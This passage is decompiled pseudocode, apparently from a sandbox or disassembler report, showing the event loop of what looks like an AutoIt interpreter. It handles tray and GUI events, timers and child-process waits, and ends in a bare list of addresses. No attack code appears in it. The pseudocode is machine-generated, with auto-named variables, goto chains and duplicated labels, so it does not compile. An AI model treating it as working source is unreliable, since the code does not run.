																			goto L167;
																		case 6:
																			__esi = _v356;
																			__eflags = __esi;
																			if(__esi == 0) {
																				goto L167;
																			}
																			__ecx = __esi;
																			L165:
																			__eax = E00AC1CB6(__ecx);
																			_push(__esi);
																			L166:
																			L00AD105C();
																			_t1022 = _t1022 + 4;
																			goto L167;
																		case 7:
																			__ecx = _v356;
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = E00B07AAD(__ebx, __ecx, __edi, __ecx);
																			}
																			goto L167;
																	}
																}
															}
															E00AB39BE(_t983,  *((intOrPtr*)( *((intOrPtr*)( *(_v372 + 4) + _t1010 * 4)))),  &_v356, _v328 | 0x00000200, 1);
															_t903 = _v364;
															__eflags = _t903;
															if(_t903 != 0) {
																E00AC15F4(_t903, _t903);
																_v352 = 0;
															}
															_t704 = _v344;
															__eflags = _t704 - 5;
															if(_t704 < 5) {
																L208:
																_v344 = 1;
																_v356 = 0;
																goto L210;
															} else {
																_t681 = _t704 + 0xfffffffb;
																__eflags = _t681 - 0xa;
																if(_t681 > 0xa) {
																	goto L208;
																}
																switch( *((intOrPtr*)(_t681 * 4 +  &M00AF453F))) {
																	case 0:
																		__ecx = _v356;
																		__eflags = __ecx;
																		if(__eflags != 0) {
																			__eax = E00AB41C4(__ecx, __edi, __eflags, __ecx);
																		}
																		goto L208;
																	case 1:
																		goto L208;
																	case 2:
																		__eax = _v356;
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L208;
																		}
																		_push(__eax);
																		__imp__#9();
																		_push(_v360);
																		goto L207;
																	case 3:
																		__eax = _v356;
																		_v388 = __eax;
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L208;
																		}
																		_t363 = __eax + 8; // 0x8
																		__ecx = _t363;
																		goto L206;
																	case 4:
																		_v356 = L00AD105C( *((intOrPtr*)(_v356 + 4)));
																		_push(_v356);
																		goto L207;
																	case 5:
																		__ecx = _v356;
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = E00B07A98(__ecx, __ecx);
																		}
																		goto L208;
																	case 6:
																		__eax = _v356;
																		_v388 = __eax;
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L208;
																		}
																		__ecx = __eax;
																		L206:
																		__eax = E00AC1CB6(__ecx);
																		_push(_v388);
																		L207:
																		__eax = L00AD105C();
																		__esp = __esp + 4;
																		goto L208;
																	case 7:
																		__ecx = _v356;
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = E00B07AAD(__ebx, __ecx, __edi, __ecx);
																		}
																		goto L208;
																}
															}
														}
														goto L192;
													}
													_t903 = _t903 - 1;
													__eflags = _t903;
													if(_t903 >= 0) {
														goto L192;
													}
													goto L183;
												}
											} else {
												goto L172;
											}
											do {
												L172:
												_t707 =  *((intOrPtr*)( *((intOrPtr*)(_t902 + _t1008 * 4))));
												__eflags = _t707 - 0x24;
												if(_t707 == 0x24) {
													L175:
													_t1008 = _t1008 + 1;
													__eflags = _t1008;
													goto L176;
												}
												__eflags = _t707 - 0x1e;
												if(_t707 != 0x1e) {
													goto L176;
												}
												_t975 = 0x100;
												goto L175;
												L176:
												_t708 =  *((intOrPtr*)(_t902 + _t1008 * 4));
												__eflags =  *((short*)(_t708 + 8));
											} while ( *((short*)(_t708 + 8)) == 0);
											_v328 = _t975;
											_v304 = _t1008;
											goto L178;
											L210:
											_v368 = _v368 + 4;
											_t1008 = _t1010 + _v360 + 1;
											_t690 = _v376 + 1;
											_v304 = _t1008;
											_v376 = _t690;
											__eflags = _t690 -  *((intOrPtr*)(_v332 + 0x14));
										} while (__eflags <= 0);
										goto L211;
									}
									_t978 = _v140 + 8;
									__eflags = _t978;
									_v360 = _t978;
									while(1) {
										_t906 =  *((intOrPtr*)(_t649 + 4));
										_v376 = _t906;
										_t709 =  *((intOrPtr*)(_t906 + _t1007 * 4));
										__eflags =  *((short*)(_t709 + 8));
										if( *((short*)(_t709 + 8)) != 0) {
											goto L151;
										}
										L143:
										_t974 =  *(_v372 + 4);
										do {
											_t716 =  *((intOrPtr*)(_t974 + 4 + _t1007 * 4));
											__eflags =  *((short*)(_t716 + 8)) - 0x33;
											if( *((short*)(_t716 + 8)) == 0x33) {
												L147:
												_t718 =  *((intOrPtr*)( *((intOrPtr*)(_t974 + _t1007 * 4))));
												__eflags = _t718 - 0x24;
												if(_t718 == 0x24) {
													goto L149;
												}
												__eflags = _t718 - 0x1e;
												if(_t718 != 0x1e) {
													L163:
													E00B1A48D(_t983, _t1063, 0x91,  *((short*)( *((intOrPtr*)( *(_v372 + 4) + 4 + _t1007 * 4)) + 0xa)));
													goto L168;
												}
												goto L149;
											}
											__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t974 + _t1007 * 4)))) -  *_t716;
											if( *((intOrPtr*)( *((intOrPtr*)(_t974 + _t1007 * 4)))) ==  *_t716) {
												goto L163;
											}
											_t906 = _v376;
											goto L147;
											L149:
											_t719 =  *((intOrPtr*)(_t906 + 4 + _t1007 * 4));
											_t1007 = _t1007 + 1;
											__eflags =  *((short*)(_t719 + 8));
										} while ( *((short*)(_t719 + 8)) == 0);
										_t978 = _v360;
										L151:
										_t710 =  *((intOrPtr*)(_t906 + 4 + _t1007 * 4));
										_t1011 = _t1007 + 1;
										__eflags =  *((short*)(_t710 + 8)) - 0x41;
										if( *((short*)(_t710 + 8)) != 0x41) {
											L158:
											E00B06C62(_t843,  &_v232,  *_t978);
											_t1007 = _t1011 + 1;
											_t712 = _v336;
											_t909 = _v268 + 1;
											_t978 = _v364 + 4;
											_v268 = _t909;
											_v364 = _v364 + 4;
											__eflags = _t909 -  *((intOrPtr*)(_t712 + 0x14));
											if(_t909 >=  *((intOrPtr*)(_t712 + 0x14))) {
												_t974 = _v332;
												_v368 = _v228;
												goto L170;
											}
											_t649 = _v372;
											_t906 =  *((intOrPtr*)(_t649 + 4));
											_v376 = _t906;
											_t709 =  *((intOrPtr*)(_t906 + _t1007 * 4));
											__eflags =  *((short*)(_t709 + 8));
											if( *((short*)(_t709 + 8)) != 0) {
												goto L151;
											}
											goto L143;
										}
										_t980 = _v376;
										_t1011 = _t1011 + 1;
										_t910 = 0;
										__eflags = 0;
										while(1) {
											_t715 =  *( *((intOrPtr*)(_t980 + _t1011 * 4)) + 8) & 0x0000ffff;
											__eflags = _t715 - 0x47;
											if(_t715 != 0x47) {
												goto L155;
											}
											L154:
											_t910 = _t910 + 1;
											L162:
											_t1011 = _t1011 + 1;
											_t715 =  *( *((intOrPtr*)(_t980 + _t1011 * 4)) + 8) & 0x0000ffff;
											__eflags = _t715 - 0x47;
											if(_t715 != 0x47) {
												goto L155;
											}
											goto L154;
											L155:
											__eflags = _t715 - 0x48;
											if(_t715 != 0x48) {
												__eflags = _t715 - 0x40;
												if(_t715 != 0x40) {
													goto L162;
												}
												__eflags = _t910;
												if(_t910 == 0) {
													L157:
													_t978 = _v360;
													goto L158;
												}
												goto L162;
											}
											_t910 = _t910 - 1;
											__eflags = _t910;
											if(_t910 >= 0) {
												goto L162;
											}
											goto L157;
										}
									}
								}
								L28:
								if( *0xb77930 != 0) {
									__eflags =  *((char*)(_t983 + 0x459)) - 1;
									if(__eflags == 0) {
										goto L29;
									}
									E00AC1207( &_v212, __eflags);
									while(1) {
										_t627 = E00B12BAF(0xb77890,  &_v216);
										__eflags = _t627;
										if(_t627 == 0) {
											break;
										}
										__eflags = _v208;
										if(_v208 == 0) {
											continue;
										}
										_t1004 = E00AB5376(_t983,  &_v212);
										__eflags = _t1004;
										if(_t1004 == 0) {
											continue;
										}
										_v164 = 0;
										_v156 = 0;
										_v152 = 1;
										E00AB4DC0(_t843,  &_v164);
										_v152 = 1;
										_v164 = _v216;
										E00AC1A36(_t843,  &_v128, __eflags, L"@TRAY_ID");
										E00AB3EA3(0xb78270, _t974, _t983, __eflags,  &_v132,  &_v168, 1);
										E00AC1CB6( &_v144);
										 *((char*)(_t983 + 0x459)) = 1;
										E00AB6CD8(_t983, _t974, _t1063,  *((intOrPtr*)(_t1004 + 0x10)) + 1, 1, 0);
										 *((char*)(_t983 + 0x459)) = 0;
										E00AB4DC0(_t843,  &_v192);
										E00AC1CB6( &_v240);
										goto L44;
									}
									_t847 =  &_v212;
									E00AC1CB6(_t847);
								}
								L29:
								_t565 =  *(_t983 + 0xf8);
								if(_t565 == 7) {
									_t566 = WaitForSingleObject( *(_t983 + 0x444), 0xa);
									_v236 = _t566;
									__eflags = _t566 - 0x102;
									if(_t566 == 0x102) {
										goto L44;
									}
									GetExitCodeProcess( *(_t983 + 0x444),  &_v236);
									CloseHandle( *(_t983 + 0x444));
									_v388 = _v236;
									L261:
									_push(_t847);
									E00ACFD60( *((intOrPtr*)( *_t983 + 4)) + _t983,  &_v388);
									L102:
									 *((char*)(_t983 + 0x144)) = 1;
									 *(_t983 + 0xf8) = 0;
									goto L44;
								}
								if(_t565 == 2) {
									L88:
									Sleep(0xa);
									__eflags =  *(_t983 + 0x2f0);
									if( *(_t983 + 0x2f0) == 0) {
										L92:
										_t574 =  *(_t983 + 0xf8);
										__eflags = _t574 - 3;
										if(_t574 < 3) {
											goto L44;
										}
										_t575 = _t574 - 3;
										__eflags = _t575 - 3;
										if(__eflags > 0) {
											goto L44;
										} else {
											switch( *((intOrPtr*)(_t575 * 4 +  &M00AF45C3))) {
												case 0:
													__ecx = __edi;
													__eax = E00AB6D79(__ecx, __edx, __eflags, __fp0, 1);
													goto L298;
												case 1:
													__ecx = __edi;
													__eax = E00AB6D79(__ecx, __edx, __eflags, __fp0, 1);
													goto L294;
												case 2:
													_t576 = E00B36562(_t983, _t974, __eflags, _t1063);
													L298:
													_t997 = _t576;
													__eflags = _t997;
													if(__eflags >= 0) {
														goto L300;
													}
													goto L299;
												case 3:
													__ecx = __edi;
													__eax = E00B36562(__ecx, __edx, __eflags, __fp0);
													L294:
													__esi = __eax;
													__eflags = __esi;
													if(__eflags < 0) {
														L299:
														_t860 =  *((intOrPtr*)( *_t983 + 4)) + _t983;
														E00B07135(_t860,  ~_t997, 0);
														_push(_t860);
														_v396 = 0;
														_t576 = E00ACFD60( *((intOrPtr*)( *_t983 + 4)) + _t983,  &_v396);
														__eflags = _t997;
														L300:
														if(__eflags == 0) {
															goto L44;
														}
														__eflags = _t997;
														if(_t997 <= 0) {
															L305:
															 *((char*)(_t983 + 0x144)) = 1;
															 *(_t983 + 0xf8) = 0;
															E00B157FF(_t576,  *(_t983 + 0x2f4), _t1063);
															goto L44;
														}
														L302:
														_t576 =  *(_t983 + 0xf8);
														__eflags = _t576 - 5;
														if(_t576 == 5) {
															L304:
															_v180 = 0;
															_v172 = 0;
															_v168 = 1;
															E00AB4DC0(_t843,  &_v180);
															_v168 = 7;
															_v180 =  *( *(_t983 + 0x1f0));
															__eflags =  *((intOrPtr*)( *_t983 + 4)) + _t983;
															E00B070E2(_t843,  *((intOrPtr*)( *_t983 + 4)) + _t983, _t974,  &_v180, 0);
															_t576 = E00AB4DC0(_t843,  &_v188);
															goto L305;
														}
														__eflags = _t576 - 3;
														if(_t576 != 3) {
															goto L305;
														}
														goto L304;
													}
													if(__eflags > 0) {
														goto L44;
													}
													goto L302;
											}
										}
										goto L94;
									}
									_t847 =  *(_t983 + 0x2f8);
									_t589 = E00AD0859(_t847);
									__eflags = _t974;
									if(__eflags < 0) {
										goto L92;
									}
									if(__eflags > 0) {
										L101:
										__eflags =  *(_t983 + 0xf8) - 2;
										if( *(_t983 + 0xf8) != 2) {
											_v388 = 0;
											goto L261;
										}
										goto L102;
									}
									__eflags = _t589 -  *(_t983 + 0x2f0);
									if(_t589 >=  *(_t983 + 0x2f0)) {
										goto L101;
									}
									goto L92;
								}
								if(_t565 == 8 || _t565 == 9) {
									Sleep(0xa);
									__eflags =  *(_t983 + 0x43c);
									if( *(_t983 + 0x43c) == 0) {
										L312:
										_t590 =  *(_t983 + 0xf8);
										_t999 = 0;
										_v361 = 0;
										_v388 = 0;
										__eflags = _t590 - 8;
										if(_t590 != 8) {
											__eflags = _t590 - 9;
											if(_t590 != 9) {
												goto L44;
											}
											L316:
											_t863 =  *(_t983 + 0x448);
											_t591 = 0xcccccccc;
											_v340 = 0xcccccccc;
											__eflags = _t863;
											if(_t863 == 0) {
												L320:
												__eflags =  *(_t983 + 0xf8) - 8;
												if( *(_t983 + 0xf8) != 8) {
													__eflags =  *((intOrPtr*)( *_t983 + 4)) + _t983;
													E00ACFDAE(_t843,  *((intOrPtr*)( *_t983 + 4)) + _t983, _t591, 0);
												} else {
													_v388 = _t999;
													asm("fild dword [esp+0x8]");
													__eflags = _t999;
													if(_t999 < 0) {
														_t1063 = _t1063 +  *0xb6cac8;
													}
													_push(_t863);
													_v388 = _t1063;
													E00B2D016(_t843,  *((intOrPtr*)( *_t983 + 4)) + _t983,  &_v388);
												}
												 *((char*)(_t983 + 0x144)) = 1;
												 *(_t983 + 0xf8) = 0;
												Sleep( *(_t983 + 0x2f4));
												goto L44;
											}
											GetExitCodeProcess(_t863,  &_v340);
											__eflags = _v340 - 0x103;
											if(_v340 != 0x103) {
												L319:
												CloseHandle( *(_t983 + 0x448));
												_t591 = _v340;
												 *(_t983 + 0x448) = 0;
												goto L320;
											}
											_t600 = WaitForSingleObject( *(_t983 + 0x448), 0);
											__eflags = _t600;
											if(_t600 != 0) {
												goto L44;
											}
											goto L319;
										}
										_t974 =  &_v388;
										E00B14148(_t983 + 0x42c, _t974, _t1063,  &_v361);
										_t1022 = _t1022 + 4;
										__eflags = _v361 - 1;
										if(_v361 != 1) {
											goto L44;
										}
										_t999 = _v388;
										goto L316;
									}
									_t847 =  *(_t983 + 0x440);
									_t603 = E00AD0859(_t847);
									__eflags = _t974;
									if(__eflags < 0) {
										goto L312;
									}
									if(__eflags > 0) {
										L310:
										_t604 =  *(_t983 + 0x448);
										__eflags = _t604;
										if(_t604 != 0) {
											CloseHandle(_t604);
											 *(_t983 + 0x448) = 0;
										}
										_v388 = 0;
										goto L261;
									}
									__eflags = _t603 -  *(_t983 + 0x43c);
									if(_t603 <  *(_t983 + 0x43c)) {
										goto L312;
									}
									goto L310;
								} else {
									if(_t565 == 3 || _t565 == 4 || _t565 == 5 || _t565 == 6) {
										goto L88;
									} else {
										_t869 = _a4;
										 *((intOrPtr*)(_t983 + 0xf4)) = _t869;
										_a4 = _t869 + 1;
										_t1000 = E00AC2FA0(_t869);
										_v332 = _t1000;
										if(_t1000 == 0) {
											 *(_t983 + 0xf8) = 1;
											goto L44;
										}
										_t974 = 0;
										_v324 = 0;
										_v316 = 0;
										_v312 = 1;
										_t608 =  *((intOrPtr*)( *((intOrPtr*)(_t1000 + 4))));
										_v388 = _t608;
										_v368 = 0;
										_v372 = 0;
										_t609 =  *((short*)(_t608 + 8));
										if(_t609 != 0) {
											__eflags = _t609 - 0x33;
											if(_t609 != 0x33) {
												_t610 = _t609 - 1;
												__eflags = _t610 - 0x7e;
												if(_t610 > 0x7e) {
													L271:
													_t613 = E00AB53B0(_t843, _t983, _t1063, _t1000,  &_v372,  &_v324, 0xffffffff);
													L84:
													__eflags = _t613;
													if(_t613 >= 0) {
														L81:
														_t615 =  *((intOrPtr*)( *((intOrPtr*)(_t1000 + 4)) + _v372 * 4));
														__eflags =  *((short*)(_t615 + 8)) - 0x7f;
														if( *((short*)(_t615 + 8)) == 0x7f) {
															L40:
															_t1001 = _v316;
															if(_t1001 != 0) {
																 *( *(_t1001 + 0xc)) =  *( *(_t1001 + 0xc)) - 1;
																__eflags =  *( *(_t1001 + 0xc));
																if( *( *(_t1001 + 0xc)) == 0) {
																	L00AD105C( *_t1001);
																	L00AD105C( *(_t1001 + 0xc));
																	_t1022 = _t1022 + 8;
																}
																L00AD105C(_t1001);
																_t1022 = _t1022 + 4;
																_v316 = 0;
															}
															_t974 = _v324;
															_t874 = _v312;
															_v368 = _t974;
															L42:
															if(_t874 >= 5) {
																_t847 = _t874 + 0xfffffffb;
																__eflags = _t847 - 0xa;
																if(_t847 > 0xa) {
																	goto L43;
																}
																switch( *((intOrPtr*)(_t847 * 4 +  &M00ABC434))) {
																	case 0:
																		__eflags = __edx;
																		if(__eflags != 0) {
																			__ecx = __edx;
																			__eax = E00AB41C4(__ecx, __edi, __eflags, __ecx);
																		}
																		goto L43;
																	case 1:
																		goto L43;
																	case 2:
																		__eflags = __edx;
																		if(__edx == 0) {
																			goto L43;
																		}
																		_push(__edx);
																		__imp__#9();
																		_push(_v328);
																		goto L288;
																	case 3:
																		__eflags = __edx;
																		if(__edx == 0) {
																			goto L43;
																		}
																		__ecx = __edx + 8;
																		goto L287;
																	case 4:
																		__eax = L00AD105C( *((intOrPtr*)(__edx + 4)));
																		_push(_v324);
																		goto L288;
																	case 5:
																		__eflags = __edx;
																		if(__edx != 0) {
																			__ecx = __edx;
																			__eax = E00B07A98(__ecx, __ecx);
																		}
																		goto L43;
																	case 6:
																		__eflags = __edx;
																		if(__edx == 0) {
																			goto L43;
																		}
																		__ecx = __edx;
																		L287:
																		__eax = E00AC1CB6(__ecx);
																		_push(_v368);
																		L288:
																		__eax = L00AD105C();
																		__esp = __esp + 4;
																		goto L43;
																	case 7:
																		__eflags = __edx;
																		if(__edx != 0) {
																			__ecx = __edx;
																			__eax = E00B07AAD(__ebx, __ecx, __edi, __ecx);
																		}
																		goto L43;
																}
															}
															L43:
															_v312 = 1;
															_v324 = 0;
															goto L44;
														}
														E00B1A48D(_t983, _t1063, 0x72,  *((short*)(_t615 + 0xa)));
														E00AB5190(_t843,  &_v332);
														goto L44;
													}
													goto L40;
												}
												_t61 = _t610 + 0xabc3b4; // 0x4040000
												switch( *((intOrPtr*)(( *_t61 & 0x000000ff) * 4 +  &M00ABC3A0))) {
													case 0:
														_t762 = _v388;
														_v300 = 0xb4098c;
														_v296 = 0;
														_v292 = 0;
														_v288 = 0;
														_t930 =  *_t762;
														_v388 =  *((short*)(_t762 + 0xa));
														_t764 =  *0xb78464; // 0x1
														_v376 = _t930;
														__eflags = _t764 & 0x00000001;
														if(__eflags == 0) {
															 *0xb78464 = _t764 | 0x00000001;
															_t766 = E00AC1A36(_t843,  &_v20, __eflags, L"CALL");
															_t932 =  *0xb78294; // 0xb7779c
															_push( *_t766);
															_t974 =  *_t932;
															 *0xb78468 =  *((intOrPtr*)( *((intOrPtr*)(_t974 + 4))))();
															E00AC1CB6( &(_v48.pt));
															_t930 = _v384;
														}
														__eflags = _t930 -  *0xb78468; // 0x19
														if(__eflags == 0) {
															_v404 = E00B2C355(_t843, _t983, _t1063, _t1000,  &_v376,  &_v328);
															E00B06CF1( &_v316);
															_t613 = _v404;
															goto L84;
														} else {
															_v316 =  *((intOrPtr*)(E00AC6060(_t983 + 0x470, _t930) + 0x20));
															_t779 = E00ABA820(_t983, _t1063, 0,  &_v308, _t1000,  &_v380,  &_v248, _v316);
															__eflags = _t779;
															if(_t779 < 0) {
																E00B06CF1( &_v304);
																goto L40;
															}
															_t1013 = _v380;
															_t781 = E00AC6060(_t983 + 0x470, _v380);
															__eflags = _v248 -  *((intOrPtr*)(_t781 + 0x18));
															if(_v248 <  *((intOrPtr*)(_t781 + 0x18))) {
																L267:
																E00B1A48D(_t983, _t1063, 0x70, _v392);
																E00B06CF1( &_v312);
																goto L40;
															}
															_t784 = E00AC6060(_t983 + 0x470, _t1013);
															__eflags = _v248 -  *((intOrPtr*)(_t784 + 0x1c));
															if(_v248 >  *((intOrPtr*)(_t784 + 0x1c))) {
																goto L267;
															}
															E00AB4DC0(_t843,  &_v328);
															_v316 = 1;
															_v328 = 1;
															_t946 =  *((intOrPtr*)( *_t983 + 4));
															_t787 =  *((intOrPtr*)(_t946 + _t983 + 8));
															_t947 = _t946 + _t983;
															__eflags =  *((char*)(_t947 + 0xd));
															if( *((char*)(_t947 + 0xd)) != 0) {
																_t787 =  *((intOrPtr*)(_t787 + 0x38));
															}
															 *(_t787 + 0x14) = 0;
															__eflags =  *((char*)(_t947 + 0xd));
															_t788 =  *((intOrPtr*)(_t947 + 8));
															if( *((char*)(_t947 + 0xd)) != 0) {
																_t788 =  *((intOrPtr*)(_t788 + 0x38));
															}
															 *((char*)(_t788 + 0x18)) = 0;
															_t791 =  *((intOrPtr*)( *_t983 + 4)) + _t983;
															_v392 = _t791;
															__eflags =  *((char*)(_t791 + 0xd));
															if( *((char*)(_t791 + 0xd)) != 0) {
																_t1014 =  *((intOrPtr*)( *((intOrPtr*)(_t791 + 8)) + 0x38));
															} else {
																_t1014 =  *((intOrPtr*)(_t791 + 8));
															}
															_t103 = _t1014 + 0x20; // 0x20
															E00AB4DC0(_t843, _t103);
															_t794 = _v392;
															 *(_t1014 + 0x2c) = 1;
															 *(_t1014 + 0x20) = 0;
															__eflags =  *((char*)(_t794 + 0xd));
															_t795 =  *((intOrPtr*)(_t794 + 8));
															if( *((char*)(_t794 + 0xd)) != 0) {
																_t795 =  *((intOrPtr*)(_t795 + 0x38));
															}
															 *((char*)(_t795 + 0x30)) = 0;
															_t796 = E00AC6060(_t983 + 0x470, _v380);
															_t974 =  *(_t796 + 0x10);
															_push( &_v332);
															_push( &_v308);
															_t800 =  *((intOrPtr*)( *((intOrPtr*)(_t796 + 0xc))))(); // executed
															__eflags = _t800;
															if(_t800 < 0) {
																E00B06CF1( &_v312);
																goto L40;
															} else {
																_t1016 = 0;
																_v312 = 0xb4098c;
																__eflags = _v304;
																if(_v304 <= 0) {
																	L80:
																	_v304 = 0;
																	L00AD105C(_v308);
																	_t1000 = _v340;
																	_t1022 = _t1022 + 4;
																	goto L81;
																}
																do {
																	_t803 = _v308;
																	_t955 =  *(_t803 + _t1016 * 4);
																	_v400 = _t955;
																	__eflags = _t955;
																	if(_t955 != 0) {
																		E00AB5190(_t843, _t955);
																		L00AD105C(_v400);
																		_t803 = _v308;
																		_t1022 = _t1022 + 4;
																	}
																	 *(_t803 + _t1016 * 4) = 0;
																	_t1016 = _t1016 + 1;
																	__eflags = _t1016 - _v304;
																} while (_t1016 < _v304);
																goto L80;
															}
														}
													case 1:
														__eax =  &_v265;
														__ecx = __edi;
														 &_v324 =  &_v372;
														__eax = E00ABB020(__ecx, __fp0, 0, __esi,  &_v372,  &_v324,  &_v265);
														goto L84;
													case 2:
														__ecx = __edi + 0x168;
														__ecx = L00B2C6CC(__edi + 0x168);
														__eax = E00B06B40(__eax);
														__eflags = __al;
														if(__al != 0) {
															__ecx = __edi + 0x168;
															L00B2C6CC(__edi + 0x168) =  &_v372;
															__ecx = __edi;
															__eax = E00B2BC26(__ecx, __edx, __fp0, __esi,  &_v372,  &_v372);
															goto L84;
														}
														__eax = _v388;
														__ecx = __edi;
														 *((short*)(_v388 + 0xa)) = E00B1A48D(__edi, __fp0, 0xa7,  *((short*)(_v388 + 0xa)));
														__ecx =  &_v332;
														__eax = E00AB5190(__ebx, __ecx);
														goto L44;
													case 3:
														goto L42;
													case 4:
														goto L271;
												}
											}
											E00AB9C80(_t983, _t1063, _t1000); // executed
											goto L40;
										}
										E00AB9A00(_t983, _t1063, _t1000,  &_a4); // executed
										goto L40;
									}
								}
							} else {
								_t1040 =  *0xb777e8 - 1;
								if( *0xb777e8 != 1) {
									_v208 = 0;
									_v204 = 8;
									_t974 = 8 * _t996 >> 0x20;
									_t811 = E00AD0FE6(_t843, _t983, _t1040,  ~(0 | _t1040 > 0x00000000) | 0x00000008 * _t996);
									_v212 = _t811;
									_t847 = 0;
									 *_t811 = 0;
									_t621 = E00AD0FE6(_t843, _t983, _t1040, 4);
									_t1022 = _t1022 + 8;
									if(_t621 == 0) {
										_t621 = 0;
									} else {
										 *_t621 = 1;
									}
									_v192 = _t621;
									while( *0xb777dc != 0) {
										_t622 =  *0xb777e0; // 0x3460458
										_t1002 =  *_t622;
										E00B36655( &_v208, _t1002);
										_t847 = 0xb777dc;
										E00AC5C75(0xb777dc);
										__eflags = _t1002;
										if(_t1002 != 0) {
											_t847 = _t1002;
											E00AC5C5D(_t847, 0xb777dc);
										}
										__eflags = _v200;
										 *0xb78420 = 0;
										if(_v200 == 0) {
											continue;
										} else {
											_t847 = _t983;
											_t1012 = E00AB5376(_t847,  &_v204);
											__eflags = _t1012;
											if(_t1012 == 0) {
												continue;
											}
											_v276 = 0;
											_v268 = 0;
											_v264 = 1;
											E00AB4DC0(_t843,  &_v276);
											_v264 = 1;
											_v276 = _v208;
											E00AC1A36(_t843,  &_v56, __eflags, L"@GUI_CTRLID");
											E00AB3EA3(0xb78270, _t974, _t983, __eflags,  &_v60,  &_v280, 1);
											E00AC1CB6( &_v72);
											E00AB4DC0(_t843,  &_v292);
											_v280 = 7;
											_v292 = _v204;
											E00AC1A36(_t843,  &_v120, __eflags, L"@GUI_WINHANDLE");
											E00AB3EA3(0xb78270, _t974, _t983, __eflags,  &_v124,  &_v296, 1);
											E00AC1CB6( &_v136);
											E00AB4DC0(_t843,  &_v308);
											_v296 = 7;
											_v308 = _v216;
											E00AC1A36(_t843,  &_v120, __eflags, L"@GUI_CTRLHANDLE");
											E00AB3EA3(0xb78270, _t974, _t983, __eflags,  &_v124,  &_v312, 1);
											E00AC1CB6( &_v136);
											 *((char*)(_t983 + 0x458)) = 1;
											E00AB6CD8(_t983, _t974, _t1063,  *((intOrPtr*)(_t1012 + 0x10)) + 1, 1, 0);
											 *((char*)(_t983 + 0x458)) = 0;
											E00AB4DC0(_t843,  &_v336);
											E00AC1CB6( &_v264);
											goto L44;
										}
									}
									if( *0xb777bc == 0) {
										__eflags =  *0xb7791c;
										if( *0xb7791c != 0) {
											L137:
											_push(0xa);
											L138:
											Sleep();
											goto L25;
										}
										__eflags =  *0xb78420 - 0x64;
										if( *0xb78420 >= 0x64) {
											goto L137;
										}
										 *0xb78420 =  *0xb78420 + 1;
										_push(0);
										goto L138;
									}
									L25:
									_t1003 = _v192;
									 *_t1003 =  *_t1003 - 1;
									if( *_t1003 == 0) {
										L00AD105C(_v204);
										L00AD105C(_t1003);
										_t1022 = _t1022 + 8;
									}
								}
								goto L27;
							}
						} else {
							_t1017 =  *((intOrPtr*)(_t983 + 0x44c));
							 *0xb7841c = 1;
							_v368 = 0;
							_v388 = _t983 + 0x44c;
							L11:
							L11:
							if(_t1017 != 0) {
								goto L50;
							} else {
								_t986 = _v388;
								goto L13;
							}
							while(1) {
								L13:
								_t814 =  *_t986;
								while(1) {
									L14:
									_v376 = _t814;
									if(_t814 == 0) {
										break;
									}
									_t847 =  *_t814;
									__eflags =  *((char*)(_t847 + 0x11));
									if(__eflags != 0) {
										_t847 = _t986;
										E00B1A7CB(_t847,  &_v376);
										L13:
										_t814 =  *_t986;
										continue;
									}
									_t814 =  *(_t814 + 4);
								}
								_t983 = _v336;
								 *0xb7841c = _t814;
								if(_v368 > _t814) {
									goto L44;
								} else {
									_t16 = _t814 + 2; // 0x2
									_t996 = _t16;
									goto L17;
								}
							}
							L50:
							_t813 =  *_t1017;
							__eflags =  *((char*)(_t813 + 0x11));
							if(__eflags != 0) {
								L57:
								_t1017 =  *((intOrPtr*)(_t1017 + 4));
								goto L11;
							}
							_t987 =  *((intOrPtr*)(_t813 + 0x14));
							_t817 = timeGetTime();
							_t847 = _t817;
							_t974 = 0;
							_t818 = _t817 - _t987;
							__eflags = _t987 - 0x7fffffff;
							if(_t987 > 0x7fffffff) {
								__eflags = _t847 - 0x7fffffff;
								if(_t847 <= 0x7fffffff) {
									L54:
									_t988 =  *_t1017;
									__eflags = _t974;
									if(__eflags < 0) {
										goto L57;
									}
									if(__eflags > 0) {
										L103:
										_v368 = _v368 + 1;
										 *((intOrPtr*)(_t988 + 0x14)) = timeGetTime();
										_t820 = E00AB5376(_v336,  *_t1017);
										 *((char*)( *_t1017 + 0x10)) = 1;
										_t847 = _v340;
										E00AB6CD8(_t847, _t974, _t1063,  *((intOrPtr*)(_t820 + 0x10)) + 1, 1, 0);
										 *((char*)( *_t1017 + 0x10)) = 0;
										goto L57;
									}
									__eflags = _t818 -  *((intOrPtr*)(_t988 + 0x18));
									if(__eflags >= 0) {
										goto L103;
									}
									goto L57;
								}
								L53:
								asm("cdq");
								goto L54;
							}
							__eflags = _t847 - 0x7fffffff;
							if(_t847 > 0x7fffffff) {
								goto L54;
							}
							goto L53;
						}
					}
					goto L46;
				}
			}

0x00abbc70
0x00abbc70
0x00abbc76
0x00abbc7e
0x00abbc80
0x00abbc84
0x00abbc8f
0x00af35a6
0x00af35b2
0x00abbf44
0x00abbf49
0x00abbf49
0x00abbc95
0x00abbc96
0x00abbc9f
0x00abc256
0x00abc256
0x00abc25c
0x00abc260
0x00abc260
0x00abc262
0x00000000
0x00000000
0x00af35be
0x00af35c3
0x00af35c5
0x00af35ce
0x00af35d0
0x00af35d0
0x00af35de
0x00af35e3
0x00af35e3
0x00abc260
0x00abbca5
0x00abbcac
0x00abbcb3
0x00abbf25
0x00abbf25
0x00abbf2b
0x00abbf35
0x00abc2b1
0x00abc2b6
0x00abc2bd
0x00abbf42
0x00abbf42
0x00000000
0x00abbf42
0x00abc2c5
0x00abc2cc
0x00abc2d8
0x00abc2f2
0x00abc2f4
0x00abc2f6
0x00000000
0x00000000
0x00af4509
0x00af4511
0x00af451f
0x00af4533
0x00af4535
0x00af4535
0x00000000
0x00af4539
0x00abbf3c
0x00000000
0x00abbcb9
0x00abbcc0
0x00abbccd
0x00abbccf
0x00abbcd7
0x00af44ea
0x00af44ef
0x00af44ff
0x00000000
0x00af44ff
0x00abbce4
0x00af35ec
0x00af35f4
0x00af35f7
0x00af35fb
0x00af3600
0x00af3606
0x00af3609
0x00af3611
0x00af3613
0x00af3615
0x00af361b
0x00af3621
0x00af3625
0x00af3627
0x00af364d
0x00af364d
0x00af364f
0x00af369c
0x00000000
0x00af369c
0x00af3662
0x00af3682
0x00af3692
0x00abbf13
0x00abbf13
0x00abbf18
0x00abbf1f
0x00000000
